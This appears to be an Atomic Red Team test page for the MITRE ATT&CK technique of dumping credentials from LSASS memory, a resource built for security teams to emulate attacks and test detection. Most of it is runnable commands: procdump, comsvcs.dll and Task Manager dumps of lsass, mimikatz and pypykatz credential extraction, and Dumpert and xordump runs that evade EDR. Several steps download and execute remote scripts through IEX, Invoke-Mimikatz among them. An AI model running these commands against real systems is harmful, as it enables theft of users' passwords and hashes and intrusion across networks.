Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
procdump -ma lsass.exe lsass_dump
Locally, mimikatz can be run using:
sekurlsa::Minidump lsassdump.dmp
sekurlsa::logonPasswords
Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
andHKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages
. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)The following SSPs can be used to access credentials:
- Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
- Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
- Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
- CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
-
Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking
-
Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
-
Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
-
Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
-
Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
If you see no output it is likely that execution was blocked by Anti-Virus.
If you see a message saying "wce.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install Windows Credential Editor first.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
output_file | Path where resulting data should be placed | Path | %temp%\wce-output.txt |
wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933 |
wce_exe | Path of Windows Credential Editor executable | Path | PathToAtomicsFolder\T1003.001\bin\wce.exe |
wce_url | Path to download Windows Credential Editor zip file | url | https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip |
#{wce_exe} -o #{output_file}
del "#{output_file}" >nul 2>&1
if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
Remove-Item $zippath, $parentpath\wce -Recurse
}
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp |
procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe |
#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
del "#{output_file}" >nul 2> nul
Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
Supported Platforms: Windows
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\windows\temp\dumpert.dmp.
If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download the tool first.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe |
#{dumpert_exe}
del C:\windows\temp\dumpert.dmp >nul 2> nul
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions.
Supported Platforms: Windows
-
Open Task Manager: On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking on the task bar and selecting "Task Manager".
-
Select lsass.exe: If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe and select it for manipulation.
-
Dump lsass.exe memory: Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
input_file | Path of the Lsass dump | Path | %tmp%\lsass.DMP |
mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder\T1003.001\bin\mimikatz.exe |
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
$request = [System.Net.WebRequest]::Create($url)
$response = $request.GetResponse()
$realTagUrl = $response.ResponseUri.OriginalString
$version = $realTagUrl.split('/')[-1]
$fileName = 'mimikatz_trunk.zip'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
cmd /c "if not exist #{input_file} (exit /b 1)"
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
Supported Platforms: Windows
pypykatz live lsa
py -3 --version >nul 2>&1
exit /b %errorlevel%
echo "Python 3 must be installed manually"
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
echo "PIP must be installed manually"
pypykatz -h >nul 2>&1
exit /b %errorlevel%
pip install pypykatz
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
Supported Platforms: Windows
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp |
procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe |
#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
del "#{output_file}" >nul 2> nul
Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an "access denied" error which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
This test uses the technique describe in this tweet (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\dotnet-lsass.dmp |
createdump_exe | Path of createdump.exe executable | Path | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5..\createdump.exe |
echo "Createdump Path #{createdump_exe}"
$LSASS = tasklist | findstr "lsass"
$FIELDS = $LSASS -split "\s+"
$ID = $FIELDS[1]
& "#{createdump_exe}" -u -f #{output_file} $ID
del #{output_file}
if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe |
output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp |
#{xordump_exe} -out #{output_file} -x 0x41
Remove-Item ${output_file} -ErrorAction Ignore
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}